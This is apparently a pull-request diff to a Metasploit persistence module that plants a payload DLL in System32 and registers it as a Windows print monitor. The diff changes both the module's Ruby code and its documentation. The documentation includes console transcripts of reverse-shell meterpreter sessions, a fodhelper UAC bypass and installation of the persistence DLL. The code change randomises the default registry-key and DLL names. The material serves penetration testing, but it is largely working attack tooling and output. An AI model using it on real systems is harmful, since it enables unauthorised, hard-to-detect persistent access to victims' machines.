Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
111 changes: 18 additions & 93 deletions documentation/modules/exploit/windows/persistence/port_monitor.md
Original file line number Diff line number Diff line change
Expand Up @@ -34,16 +34,17 @@ Since this requires writing to **System32** and modifying **HKLM**, **administra

### MONITOR_NAME

Name of the registry key created under:
Name of the registry key created under:
`HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`

(Default: `Hadess`)
(Default: randomized 8-character alpha string)

### DLL_NAME

Name of the payload DLL written to: `%WINDIR%\\System32`
Name of the payload DLL written to: `%WINDIR%\System32`. The `.dll` extension is
appended automatically if not supplied.

(Default: `persist.dll`)
(Default: randomized 8-character alpha string)

### RESTART_SPOOLER

Expand All @@ -53,7 +54,9 @@ Restart the Print Spooler service after installation to trigger the payload imme

## Scenarios

### Initial System Session
### Windows

#### Initial System Session

```msf exploit(windows/persistence/port_monitor) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
Expand All @@ -76,90 +79,7 @@ msf exploit(multi/handler) > run
meterpreter > background
[*] Backgrounding session 1...

msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf post(multi/recon/local_exploit_suggester) > run
[*] 172.21.176.1 - Collecting local exploits for x64/windows...
[*] 172.21.176.1 - 243 exploit checks are being tried...
[+] 172.21.176.1 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 172.21.176.1 - exploit/windows/local/bypassuac_fodhelper: The target appears to be vulnerable.
[+] 172.21.176.1 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 172.21.176.1 - exploit/windows/persistence/registry: The target is vulnerable. Registry writable
[+] 172.21.176.1 - exploit/windows/persistence/registry_userinit: The target is vulnerable. Registry likely exploitable
[+] 172.21.176.1 - exploit/windows/persistence/startup_folder: The target appears to be vulnerable. Likely exploitable, able to write test file to C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
[*] Running check method for exploit 63 / 63
[*] 172.21.176.1 - Valid modules for session 1:
============================

# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_fodhelper Yes The target appears to be vulnerable.
3 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
4 exploit/windows/persistence/registry Yes The target is vulnerable. Registry writable
5 exploit/windows/persistence/registry_userinit Yes The target is vulnerable. Registry likely exploitable
6 exploit/windows/persistence/startup_folder Yes The target appears to be vulnerable. Likely exploitable, able to write test file to C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
7 exploit/multi/persistence/ssh_key No The target is not exploitable. sshd_config file not found
8 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
9 exploit/windows/local/always_install_elevated No The target is not exploitable.
10 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
11 exploit/windows/local/bypassuac_comhijack No The target is not exploitable.
12 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
13 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
14 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
15 exploit/windows/local/capcom_sys_exec No The target is not exploitable. Target contains a block list which prevents the vulnerable driver from being loaded!
16 exploit/windows/local/cve_2019_1458_wizardopium No The target is not exploitable.
17 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. Target is not running a vulnerable version of Windows!
18 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable.
19 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
20 exploit/windows/local/cve_2020_1054_drawiconex_lpe No The target is not exploitable. No target for win32k.sys version 6.2.26100.7705
21 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable.
22 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
23 exploit/windows/local/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
24 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable.
25 exploit/windows/local/cve_2021_40449 No The target is not exploitable. Target is not running a vulnerable version of Windows!
26 exploit/windows/local/cve_2022_21882_win32k No The target is not exploitable.
27 exploit/windows/local/cve_2022_21999_spoolfool_privesc No The target is not exploitable.
28 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable.
29 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2
30 exploit/windows/local/cve_2023_28252_clfs_driver No The target is not exploitable.
31 exploit/windows/local/cve_2024_30085_cloud_files No The target is not exploitable.
32 exploit/windows/local/cve_2024_30088_authz_basep No The target is not exploitable. Version detected: Windows 10+ Build 26200. Revision number detected: 7840.
33 exploit/windows/local/cve_2024_35250_ks_driver No The target is not exploitable. Version detected: Windows 10+ Build 26200
34 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
35 exploit/windows/local/ikeext_service No The check raised an exception.
36 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store
37 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows 11 24H2+ (10.0 Build 26200). is not vulnerable
38 exploit/windows/local/ms14_058_track_popup_menu No Cannot reliably check exploitability.
39 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
40 exploit/windows/local/ms15_078_atmfd_bof No The target is not exploitable.
41 exploit/windows/local/ms16_014_wmi_recv_notif No The target is not exploitable.
42 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The check raised an exception.
43 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
44 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
45 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
46 exploit/windows/local/nvidia_nvsvc No The check raised an exception.
47 exploit/windows/local/panda_psevents No The target is not exploitable.
48 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
49 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.
50 exploit/windows/local/tokenmagic No The target is not exploitable.
51 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable.
52 exploit/windows/local/webexec No The check raised an exception.
53 exploit/windows/local/win_error_cve_2023_36874 No The target is not exploitable.
54 exploit/windows/persistence/accessibility_features_debugger No The target is not exploitable. You have admin rights to run this Module
55 exploit/windows/persistence/assistive_technology No The target is not exploitable. You have admin rights to run this Module
56 exploit/windows/persistence/notepadpp_plugin No The target is not exploitable. Notepad++ is probably not present
57 exploit/windows/persistence/port_monitor No The target is not exploitable. Admin or SYSTEM privileges are required
58 exploit/windows/persistence/service No The target is not exploitable. You must be System/Admin to run this Module
59 exploit/windows/persistence/task_scheduler No The target is not exploitable. You need higher privileges to create scheduled tasks
60 exploit/windows/persistence/wmi/wmi_event_subscription_event_log No The target is not exploitable. This module requires powershell to run
61 exploit/windows/persistence/wmi/wmi_event_subscription_interval No The target is not exploitable. This module requires powershell to run
62 exploit/windows/persistence/wmi/wmi_event_subscription_process No The target is not exploitable. This module requires powershell to run
63 exploit/windows/persistence/wmi/wmi_event_subscription_uptime No The target is not exploitable. This module requires powershell to run

[*] Post module execution completed
msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/bypassuac_fodhelper
msf exploit(multi/handler) > use exploit/windows/local/bypassuac_fodhelper
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/local/bypassuac_fodhelper) > set SESSION 1
SESSION => 1
Expand Down Expand Up @@ -208,7 +128,7 @@ meterpreter > background



### Install Persistence
#### Install Persistence

```msf exploit(windows/local/bypassuac_fodhelper) > use exploit/windows/persistence/port_monitor
[*] Using configured payload windows/meterpreter/reverse_tcp
Expand All @@ -220,9 +140,9 @@ Module options (exploit/windows/persistence/port_monitor):

Name Current Setting Required Description
---- --------------- -------- -----------
DLL_NAME persist.dll no DLL filename to write in %WINDIR%\S
DLL_NAME persist.dll yes DLL filename to write in %WINDIR%\S
ystem32.
MONITOR_NAME Hadess no Name of the print monitor registry
MONITOR_NAME Hadess yes Name of the print monitor registry
key to create.
RESTART_SPOOLER false yes Restart the Print Spooler service t
o trigger monitor loading immediate
Expand Down Expand Up @@ -299,7 +219,12 @@ reg query HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Hadess

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Hadess

  Driver REG_SZ persist.dll
Driver REG_SZ persist.dll

```

<!-- TODO: this transcript stops at the registry key being set and the Spooler
service restarting. Add the follow-up step showing the handler actually
receiving a new session after the Spooler restart/reboot, to demonstrate the
persistence firing end-to-end. -->

16 changes: 6 additions & 10 deletions modules/exploits/windows/persistence/port_monitor.rb
Original file line number Diff line number Diff line change
Expand Up @@ -31,13 +31,9 @@ def initialize(info = {})
},
'License' => MSF_LICENSE,
'Author' => ['Nayera'],
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
'DisablePayloadHandler' => true
},
'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
'Arch' => [ARCH_X64, ARCH_X86],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter', 'shell' ],
'SessionTypes' => [ 'meterpreter' ],
'Privileged' => true,
'Targets' => [
[ 'Automatic', {} ]
Expand All @@ -60,8 +56,8 @@ def initialize(info = {})

register_options(
[
OptString.new('MONITOR_NAME', [false, 'Name of the print monitor registry key to create.', 'Hadess']),
OptString.new('DLL_NAME', [false, 'DLL filename to write in %WINDIR%\\System32.', 'persist.dll']),
OptString.new('MONITOR_NAME', [true, 'Name of the print monitor registry key to create.', Rex::Text.rand_text_alpha(8)]),
OptString.new('DLL_NAME', [true, 'DLL filename to write in %WINDIR%\\System32.', Rex::Text.rand_text_alpha(8)]),
OptBool.new('RESTART_SPOOLER', [true, 'Restart the Print Spooler service to trigger monitor loading immediately.', true])
]
)
Expand All @@ -76,7 +72,8 @@ def system32_path
end

def payload_name
datastore['DLL_NAME']
name = datastore['DLL_NAME'].to_s
name.downcase.end_with?('.dll') ? name : "#{name}.dll"
end

def payload_path
Expand Down Expand Up @@ -105,7 +102,6 @@ def check
def install_persistence
fail_with(Failure::NoAccess, 'Admin or SYSTEM privileges are required') unless is_admin? || is_system?

fail_with(Failure::BadConfig, 'DLL_NAME must end in .dll') unless payload_name.downcase.end_with?('.dll')
fail_with(Failure::BadConfig, 'DLL_NAME must not contain path separators') if payload_name.match?(%r{[\\/]})
fail_with(Failure::BadConfig, 'MONITOR_NAME cannot be empty') if datastore['MONITOR_NAME'].strip.empty?

Expand Down